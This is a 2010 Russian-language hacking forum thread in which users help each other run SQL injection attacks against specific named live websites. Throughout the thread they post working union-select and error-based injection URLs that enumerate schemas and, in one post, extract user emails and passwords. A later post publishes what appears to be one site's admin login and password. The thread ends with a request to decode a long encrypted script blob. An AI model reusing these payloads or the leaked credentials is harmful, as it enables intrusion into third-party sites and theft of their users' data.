RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-11 09:19:57.960000
|
|
|
sergaj
Сообщений: 24
Оценки: 0
Присоединился: 2010-03-30 10:30:48.270000
|
База данных MSAccess
Путь к серверу c:\windows\system32\inetsrv\
Вот советую почитать: http://www.ptsecurity.ru/download/PT-devteev-Advanced-SQL-Injection.pdf
А для MSAccess (для твоего SQL inject): http://forum.antichat.ru/printthread.php?t=210003
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-11 09:52:47.620000
|
|
|
BAHO777
Сообщений: 20
Оценки: 0
Присоединился: 2010-05-18 18:50:20.180000
|
quote:
ORIGINAL: bustedtry
тут mysql нет.
Я написал MSSQL, а не MySQL. Чуешь разницу?:)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-11 10:00:58.666666
|
|
|
BAHO777
Сообщений: 20
Оценки: 0
Присоединился: 2010-05-18 18:50:20.180000
|
quote:
ORIGINAL: sergaj
База данных MSAccess
Путь к серверу c:\windows\system32\inetsrv\
Вот советую почитать: http://www.ptsecurity.ru/download/PT-devteev-Advanced-SQL-Injection.pdf
А для MSAccess (для твоего SQL inject): http://forum.antichat.ru/printthread.php?t=210003
Спасибо огромное. :) Нашёл два других сайта, пошарился в базе, определил таблицы и колонки, а дальше застрял..;)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-11 12:10:22.826666
|
|
|
sergaj
Сообщений: 24
Оценки: 0
Присоединился: 2010-03-30 10:30:48.270000
|
Не можешь извлечь записи? Что за проблема? (Если ссылки не хочешь светить - есть "Личные сообщения")
И еще: когда начнешь различать базы данных, научишься различать сообщения серверов об ошибках - тебе нужен будет софт, который автоматизирует извлечение информации из баз данных. В общем доступе ничего стоящего практически нет. Поэтому потом помогу, если энтузиазм не пропадет))
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-11 22:21:47.893333
|
|
|
bustedtry
Сообщений: 123
Оценки: 0
Присоединился: 2010-05-12 12:12:29.310000
|
Подкиньте пару статьей по слепой скуле
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-11 22:35:57.416666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: bustedtry
Подкиньте пару статьей по слепой скуле
Blind Sql Injection
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-12 02:26:21.956666
|
|
|
BAHO777
Сообщений: 20
Оценки: 0
Присоединился: 2010-05-18 18:50:20.180000
|
quote:
ORIGINAL: sergaj
Не можешь извлечь записи? Что за проблема? (Если ссылки не хочешь светить - есть "Личные сообщения")
И еще: когда начнешь различать базы данных, научишься различать сообщения серверов об ошибках - тебе нужен будет софт, который автоматизирует извлечение информации из баз данных. В общем доступе ничего стоящего практически нет. Поэтому потом помогу, если энтузиазм не пропадет))
Т.е. ты мне хочешь продать что-то?:D
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-12 02:31:04.870000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
Здесь никто ничего не продает. Здесь решаются вопросы и проблемы с sql-inj.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-12 03:02:57.430000
|
|
|
BAHO777
Сообщений: 20
Оценки: 0
Присоединился: 2010-05-18 18:50:20.180000
|
quote:
ORIGINAL: Alex.Black
Здесь никто ничего не продает. Здесь решаются вопросы и проблемы с sql-inj.
Извиняюсь, не так понял. 8|
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-12 03:05:57.900000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
Здесь не нужно разводить всякие обсуждения.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-12 07:26:20.096666
|
|
|
sergaj
Сообщений: 24
Оценки: 0
Присоединился: 2010-03-30 10:30:48.270000
|
Вот эта статья по слепым инъекциям довольно не плохая. Краткое описание инъекции, софт и видеомануал.
http://hacker-pro.net/showthread.php?t=3644
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 09:46:35.610000
|
|
|
lIbERT
Сообщений: 10
Оценки: 0
Присоединился: 2009-10-25 10:05:07.806666
|
у меня такая проблема…
есть иньекция… пишу index.php?id=-1+union+select+version(),2,3,4,5,6/*
но выдает это
Запрос: SELECT `ItemID` AS id, `UserID` AS uid, `UserLogin` AS nick, `Text` AS text, DATE_FORMAT(FROM_UNIXTIME(`ts`), '%d.%m.%y') AS date, DATE_FORMAT(FROM_UNIXTIME(`ts`), '%H:%m') AS time FROM OstrieItems WHERE ItemID = -1 union select version(),2,3,4,5,6/* ORDER BY ItemID DESC LIMIT 1
Описание ошибки: (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* ORDER BY ItemID DESC LIMIT 1' at line 12 - 1064)
никак не могу закоментировать ORDER BY ItemID DESC LIMIT 1 не поможете???
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 11:41:08.513333
|
|
|
cradis
Сообщений: 54
Оценки: 0
Присоединился: 2010-05-23 20:52:05.473333
|
lIbERT
Попробуй –.
Вообще /* редко когда канает, всегда пробуй сначала – коммент.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 11:44:03.876666
|
|
|
lIbERT
Сообщений: 10
Оценки: 0
Присоединился: 2009-10-25 10:05:07.806666
|
он тоже не помогает (( туже ошибку выдает
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 11:47:23.456666
|
|
|
lIbERT
Сообщений: 10
Оценки: 0
Присоединился: 2009-10-25 10:05:07.806666
|
точнее Описание ошибки: (Unknown column 'ItemID' in 'order clause' - 1054)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 11:49:53.883333
|
|
|
cradis
Сообщений: 54
Оценки: 0
Присоединился: 2010-05-23 20:52:05.473333
|
Тогда ссылку в студию.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 12:14:00.780000
|
|
|
lIbERT
Сообщений: 10
Оценки: 0
Присоединился: 2009-10-25 10:05:07.806666
|
http://wap.ostrie.ru/index.php?id=6565+union+select+version(),2,3,4,5,6–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 14:11:34.963333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://wap.ostrie.ru/index.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
5.1.44-0.dotdeb.0-log
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 19:24:10.876666
|
|
|
terter7777
Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
|
доброго времени суток.
нашел таблицу
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,@@version_compile_os,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+INFORMATION_SCHEMA.TABLES+limit+29,1–и
колонку
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,@@version_compile_os,6,7,COLUMN_NAME,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+INFORMATION_SCHEMA.COLUMNS+USERLIST_TAB+limit+1,1–
а при выводе инфы
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,@@version_compile_os,6,7,DEFAULT_COLLATENAME,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+USERLIST_TAB–
пишет database error: 1054-Unknown column 'DEFAULT_COLLATENAME' in 'field list'
 HELP me PLEASE
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 20:06:00.413333
|
|
|
terter7777
Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
|
кстати если обрезать INFORMATION_SCHEMA.COLUMNS+USERLIST_TAB то ответ тот же самый
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,@@version_compile_os,6,7,COLUMN_NAME,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+INFORMATION_SCHEMA.COLUMNS+USERLIST_T+limit+1,1–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 20:28:01.700000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
Думаю тебе это поможет:
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,@@version_compile_os,6,7,group_concat(column_name+separator+0x3a),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns+where+table_name=0x4348415241435445525f53455453–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 21:20:22.183333
|
|
|
lIbERT
Сообщений: 10
Оценки: 0
Присоединился: 2009-10-25 10:05:07.806666
|
тоесть если я сделаю так http://wap.ostrie.ru/index.php?id=(update `OstrieUsers` SET UserLogin = 'test' where UserLogin = 'libert')
томой ник должен измениться??
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 21:22:46.013333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: lIbERT
тоесть если я сделаю так http://wap.ostrie.ru/index.php?id=(update `OstrieUsers` SET UserLogin = 'test' where UserLogin = 'libert')
томой ник должен измениться??
неа, ты влезаешь в запрос SELECT, так что про UPDATE забудь. Максимум - вывести нужную информацию.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 21:23:14.510000
|
|
|
lIbERT
Сообщений: 10
Оценки: 0
Присоединился: 2009-10-25 10:05:07.806666
|
и как залить файл который у меня к примеру на диске С находится?? сам пробывал заливать но хз кудо оно льется…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 21:33:40.193333
|
|
|
lIbERT
Сообщений: 10
Оценки: 0
Присоединился: 2009-10-25 10:05:07.806666
|
и блин когда пишу SELECT UserLogin from OstrieUsers limit 1 выводится пустая страница
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 21:53:28.680000
|
|
|
webgraber
Сообщений: 207
Оценки: 0
Присоединился: 2010-05-15 15:49:33.586666
|
Такая проблема m4x injector выдаёт ошибку типо скуля <5 , и на шопе есть уязвимость. Что делать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 21:58:39.966666
|
|
|
fasfas
Сообщений: 152
Оценки: 0
Присоединился: 2010-06-06 14:21:15.500000
|
webgraber скинь в лс сайт
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-13 22:01:53.950000
|
|
|
terter7777
Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
|
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,@@version_compile_os,6,7,group_concat(column_name+separator+0x3a),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns+where+table_name=0x4348415241435445525f53455453–
а дальше как?[:(] подскажите пожалуйста
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-14 11:40:35.793333
|
|
|
sergaj
Сообщений: 24
Оценки: 0
Присоединился: 2010-03-30 10:30:48.270000
|
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,5,6,7,group_concat(table_name+separator+0x3a),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.tables+Where+table_schema=0x64625F77657374636F6D7031–
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,5,6,7,group_concat(column_name+separator+0x3a),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns%20Where%20table_schema=0x64625F77657374636F6D7031%20AND%20table_name=0x555345524C4953545F544142–
http://www.westcomp.ru/pricepos.php?id=-11+union+select+1,2,3,4,5,6,7,group_concat(EMAIL,0x3a,PASSWORD),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+db_westcomp1.USERLIST_TAB–
http://www.westcomp.ru/login.php
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-14 14:07:52.753333
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Вот админка = valdis@westcomp.ru
1269479
|
|
|
|
|
помогите раскодировать - 2010-06-14 19:37:47.653333
|
|
|
lokanaft
Сообщений: 2
Оценки: 0
Присоединился: 2009-01-04 13:41:17.620000
|
Модератор сказал писать сюда хотя врят ли подходящая тема, но всё таки:
Помогите разобраться с шифром, он кодируется в обе стороны, то есть расшифровать можно, вопрос как?
Вот пример:
Зашифрованный сценарий. Версия: 10
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